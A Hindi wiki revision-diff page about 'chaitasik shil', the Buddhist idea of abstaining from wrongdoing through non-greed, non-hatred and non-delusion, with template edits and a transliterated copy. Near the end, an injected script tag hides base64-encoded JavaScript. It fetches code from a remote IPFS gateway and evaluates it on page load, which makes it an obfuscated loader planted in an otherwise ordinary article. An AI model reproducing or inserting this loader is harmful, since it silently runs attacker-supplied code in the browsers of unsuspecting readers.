Difference between revisions of "चैतसिक शील बौद्ध निकाय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==सम्बंधित लिंक==" to "==संबंधित लेख==")
m (Text replace - "{{बौद्ध दर्शन2}}" to "{{बौद्ध धर्म}}")
Line 2: Line 2:
 
जीवहिंसा आदि दुष्टकर्मों से विरत रहने वाले पुरुष की वह विरति 'चैतसिक शील' है अर्थात दुष्कर्मों के करने से रोकने वाली शक्त्ति 'विरति है। यह विरति भी एक प्रकार का 'शील' है, अत: इसे 'विरति शील' भी कहते हैं। अथवा लोभ, द्वेष मोह आदि का प्रहाण करने वाले पुरुष के जो अलोभ, अद्वेष, अमोह हैं, वे 'चैतसिक शील' हैं अर्थात जिस पुरुष की सन्तान में लोभ, मोह न होंगे वह काय दुच्चरित आदि दुष्कर्मों सें विरत रहेगा। अत: इन्हें (अलोभ आदि को) 'विरति शील' कहते हैं।  
 
जीवहिंसा आदि दुष्टकर्मों से विरत रहने वाले पुरुष की वह विरति 'चैतसिक शील' है अर्थात दुष्कर्मों के करने से रोकने वाली शक्त्ति 'विरति है। यह विरति भी एक प्रकार का 'शील' है, अत: इसे 'विरति शील' भी कहते हैं। अथवा लोभ, द्वेष मोह आदि का प्रहाण करने वाले पुरुष के जो अलोभ, अद्वेष, अमोह हैं, वे 'चैतसिक शील' हैं अर्थात जिस पुरुष की सन्तान में लोभ, मोह न होंगे वह काय दुच्चरित आदि दुष्कर्मों सें विरत रहेगा। अत: इन्हें (अलोभ आदि को) 'विरति शील' कहते हैं।  
 
==संबंधित लेख==
 
==संबंधित लेख==
{{बौद्ध दर्शन2}}
+
{{बौद्ध धर्म}}
 
{{अठारह बौद्ध निकाय}}
 
{{अठारह बौद्ध निकाय}}
 
{{शील विमर्श}}
 
{{शील विमर्श}}
 
{{बौद्ध दर्शन}}
 
{{बौद्ध दर्शन}}
 
[[Category:दर्शन कोश]] [[Category:बौद्ध दर्शन]]  [[Category:बौद्ध धर्म]]    [[Category:बौद्ध धर्म कोश]]__INDEX__
 
[[Category:दर्शन कोश]] [[Category:बौद्ध दर्शन]]  [[Category:बौद्ध धर्म]]    [[Category:बौद्ध धर्म कोश]]__INDEX__

Revision as of 06:42, 17 March 2011

bauddh dharm ke atharah bauddh nikayoan mean chaitasik shil ki yah paribhasha hai:-
jivahiansa adi dushtakarmoan se virat rahane vale purush ki vah virati 'chaitasik shil' hai arthat dushkarmoan ke karane se rokane vali shaktti 'virati hai. yah virati bhi ek prakar ka 'shil' hai, at: ise 'virati shil' bhi kahate haian. athava lobh, dvesh moh adi ka prahan karane vale purush ke jo alobh, advesh, amoh haian, ve 'chaitasik shil' haian arthat jis purush ki santan mean lobh, moh n hoange vah kay duchcharit adi dushkarmoan sean virat rahega. at: inhean (alobh adi ko) 'virati shil' kahate haian.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

Template:bauddh darshan